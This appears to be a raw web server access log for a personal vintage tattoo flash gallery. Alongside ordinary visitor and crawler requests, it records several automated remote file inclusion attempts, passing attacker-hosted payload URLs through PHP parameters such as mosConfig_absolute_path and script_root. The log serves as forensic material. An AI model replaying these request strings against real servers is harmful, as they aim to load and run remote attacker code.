205.188.116.200 - - [03/May/2010:21:01:33 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.201 - - [03/May/2010:21:01:33 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.202 - - [03/May/2010:21:01:34 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.206 - - [03/May/2010:21:01:34 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.204 - - [03/May/2010:21:01:34 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.205 - - [03/May/2010:21:01:34 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.207 - - [03/May/2010:21:01:34 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.203 - - [03/May/2010:21:01:34 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.210 - - [03/May/2010:21:02:01 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.201 - - [03/May/2010:21:02:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.200 - - [03/May/2010:21:02:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.202 - - [03/May/2010:21:02:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.203 - - [03/May/2010:21:02:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.205 - - [03/May/2010:21:02:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.206 - - [03/May/2010:21:02:02 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
77.222.56.62 - - [03/May/2010:21:02:02 -0500] "GET /logs/access_log.1223683200//stats/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
205.188.116.10 - - [03/May/2010:21:02:03 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.138 - - [03/May/2010:21:02:03 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.208 - - [03/May/2010:21:02:03 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
77.222.56.62 - - [03/May/2010:21:02:03 -0500] "GET //stats/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
205.188.116.207 - - [03/May/2010:21:02:03 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
77.222.56.62 - - [03/May/2010:21:02:03 -0500] "GET /logs//stats/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
205.188.116.136 - - [03/May/2010:21:02:27 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.204 - - [03/May/2010:21:02:27 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.202 - - [03/May/2010:21:02:27 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.203 - - [03/May/2010:21:02:27 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.218.116.165 - - [03/May/2010:21:03:04 -0500] "GET /logs/?N=A HTTP/1.1" 200 4241 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
96.227.51.190 - - [03/May/2010:21:05:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
96.227.51.190 - - [03/May/2010:21:05:14 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
96.227.51.190 - - [03/May/2010:21:05:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.59.164.98 - - [03/May/2010:21:06:14 -0500] "GET /fi%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.59.164.98 - - [03/May/2010:21:06:14 -0500] "GET /logs/fi%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
209.59.164.98 - - [03/May/2010:21:06:14 -0500] "GET /logs/access_log.1225238400/fi%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.59.164.98 - - [03/May/2010:21:06:15 -0500] "GET /logs/access_log.1266278400/fi%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
96.227.51.190 - - [03/May/2010:21:07:37 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
96.227.51.190 - - [03/May/2010:21:07:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.13.53 - - [03/May/2010:21:12:24 -0500] "GET /logs/access_log.1192579200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.54.71.20 - - [03/May/2010:21:17:16 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "-""-"
119.63.198.37 - - [03/May/2010:21:18:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.112.180 - - [03/May/2010:21:19:01 -0500] "GET /logs/access_log.1237075200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.50.85.15 - - [03/May/2010:21:21:26 -0500] "GET /logs/access_log.1263859200/formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:26 -0500] "GET /logs/formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:26 -0500] "GET /formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:26 -0500] "GET /logs/access_log.1263772800/formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:31 -0500] "GET /formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:31 -0500] "GET /logs/formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:31 -0500] "GET /logs/access_log.1263859200/formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.50.85.15 - - [03/May/2010:21:21:31 -0500] "GET /logs/access_log.1263772800/formmail.inc.php?script_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:21:22:17 -0500] "GET /logs//skin/dognara_gallery/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:21:22:17 -0500] "GET //skin/dognara_gallery/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:21:22:17 -0500] "GET /logs/access_log.1265760000//skin/dognara_gallery/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:21:22:38 -0500] "GET //?sIncPath=http://www.villantomagazin.com//1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:21:22:38 -0500] "GET /logs/access_log.1265760000//?sIncPath=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:21:22:38 -0500] "GET /logs//?sIncPath=http://www.villantomagazin.com//1.txt? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
115.68.20.197 - - [03/May/2010:21:27:44 -0500] "GET /index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
115.68.20.197 - - [03/May/2010:21:27:46 -0500] "GET /logs/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
115.68.20.197 - - [03/May/2010:21:27:48 -0500] "GET /logs/access_log.1270857600/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
115.68.20.197 - - [03/May/2010:21:27:54 -0500] "GET /logs/access_log.1208649600/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.250.255.243 - - [03/May/2010:21:28:03 -0500] "GET /logs/access_log.1271030400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.141 - - [03/May/2010:21:33:54 -0500] "GET /logs/access_log.1195948800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [03/May/2010:21:35:42 -0500] "GET /logs/access_log.1224288000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.189.224.16 - - [03/May/2010:21:36:56 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 313 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [03/May/2010:21:36:56 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 308 "-""Mozilla/4.61 (Macintosh; I; PPC)"
207.46.13.46 - - [03/May/2010:21:41:24 -0500] "GET /logs/access_log.1224028800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
68.149.84.28 - - [03/May/2010:21:46:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.ca/search?client=safari&rls=en&q=vintage+tattoo+flash&ie=UTF-8&oe=UTF-8&redir_esc=&ei=gIrfS__1MMT68AaEntmpBw""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:40 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:40 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:41 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:41 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:41 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:41 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:41 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:41 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:42 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:42 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:46:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:16 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:16 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:17 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:17 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:17 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:17 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:17 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:17 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:18 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:18 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:18 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:27 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
